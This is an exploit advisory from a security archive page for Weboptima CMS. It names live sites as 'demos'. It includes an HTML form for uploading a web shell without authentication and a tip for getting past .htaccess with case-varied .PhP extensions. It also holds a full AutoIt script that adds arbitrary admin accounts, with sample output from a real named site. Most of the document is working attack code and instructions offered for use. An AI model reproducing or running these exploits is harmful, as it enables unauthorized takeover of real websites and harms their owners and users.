Twenty Year Anniversary

Weboptima CMS Add Administrator / Shell Upload

Weboptima CMS Add Administrator / Shell Upload
Posted Jan 23, 2013
Authored by Akastep

Weboptima CMS suffers from add administrator and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, add administrator
MD5 | 3643a702108fdb2bb08d1d7e1a8dfed3

Weboptima CMS Add Administrator / Shell Upload

Change Mirror Download
#cs
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm AkaStep member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

weboptima_cms_remote_add_admin_shell_upload.au3

============================================
Vulnerable Software: Weboptima CMS
Vendor: http://weboptima.am/
Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN.
Both Exploits are available(HTML exploit to upload shell)
And Autoit Exploit to add arbitrary admin accounts to target site.
More detailts below.
============================================

Few DEMOS:
http://navasards.am
http://olivergroup.am
http://iom.am
http://bluefly.am
http://invest-in-armenia.com
http://decart.am
http://armgeokart.am/

============================================
About Vulns:

1'ST vulnerability is REMOTE SHELL UPLOAD:
Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL.
Vulnerable code:

//cms/upload.php
=============SNIP BEGINS======================
<?php
$path="../uploades";
if(!file_exists($path))
{
mkdir($path, 0777);
}

if(isset($_GET['name']))
{
unlink($path."/".$_GET['name']);
$letter = $_GET['letter'];
$selTypey = $_GET['selType'];
header("Location: upload.php?letter=$letter&selType=$selTypey");
}
?>
<?php include_once("start.php"); ?>
<div align="center">
<table align="center">
<tr>
<td colspan="3" align="center"><span class="title">Կցված ֆայլեր</span></td>
</tr>
<tr>
<td>
<?php
if(isset($_POST['sub']))
{
$fileName = $_FILES["up_file"]['name'];
$masSimbl = array('&','%','#');
if(in_array($fileName[0], $masSimbl))
{
echo $fileName[0].' սիմվոլով սկսվող անուն չընտրել';
}
else
{
move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']);
}
}
?>
========================SNIP ENDS=================




Simple HTML exploit to upload your shell:

<form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
<input type="file" name="up_file" />&nbsp;&nbsp;<input type="submit" class="button" name="sub" value="send"></form>

After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php

NOTE: There may be simple .htaccess to prevent you from accessing shell(HTTP 403).
This is not problem just upload your shell like:

myshell.PhP
or
myshell.pHp

OWNED.



2'nd vulnerability is: REMOTE ADD ADMIN
Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE.
Vulnerable Code:
//cms/loginPass.php
Notice: header() without exit;*Script continues it's execution.*
==================SNIP BEGINS=========
<?php
session_start();
if($_SESSION['status_shoping_adm']!="adm_shop") {
header("Location: index.php");
}
require_once('../myClass/DatabaseManeger.php');
require_once("../myClass/function.php");

$_POST = stripSlash($_POST);
$_GET = stripSlash($_GET);
?>
<?php
$error = "";
//And more stuff
==================SNIP ENDS=============

And here is exploit written in Autoit to exploit
this vulnerability and add admin to target site.


Exploit usage(CLI):

weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere


##############################################################
Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: weboptima.exe http://site.tld username password
[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]

##################################################
Trying to add new admin:
To Site:www.decart.am
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
##################################################

##################################################
Exploit Try Count:1
##################################################
Error Count:0
##################################################

##################################################
Exploit Try Count:2
##################################################
Error Count:0
##################################################
Count of errors during exploitation : 0

##################################################
[*] Yaaaaa We are Going To Travel xD [*]
Try to login @
Site: decart.am/cms/index.php
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
*NOTE* Make Sure Your Browser Reveals HTTP REFERER!
OTHERWISE YOU WILL UNABLE TO LOGIN!
##################################################
[*] Exit [*]
##################################################


#ce
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _
'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _
@CRLF & "[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _
'[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';
$vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
Global $count=0,$error=0;
$cmsindent='kcaptcha'; # We will use it to identify CMS #;
$adminpanel='/cms/index.php';

;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF
if $CmdLine[0] <> 3 Then
MsgBox(64,"",$msg_usage);
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
exit;
EndIf


if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf



if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf


HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf


ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));



HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);




if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf




$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')


priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)


$count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;


Global $sAddress = $targetsite

$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)

$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";


if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

if int($error)=0 then
ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & @CRLF & _
'*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
' OTHERWISE YOU WILL UNABLE TO LOGIN! ' & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else

ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*] May be you are Lucky;) [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);

EndIf
exit;

EndIf



Global $hOpen = _WinHttpOpen($useragent);
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
_WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
_WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
_WinHttpSendRequest($hRequest, -1, $sPostData)
_WinHttpReceiveResponse($hRequest)

Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;

Else
$error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#;

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#

EndIf

EndFunc;=> priv8();


#cs

================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep


#ce

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close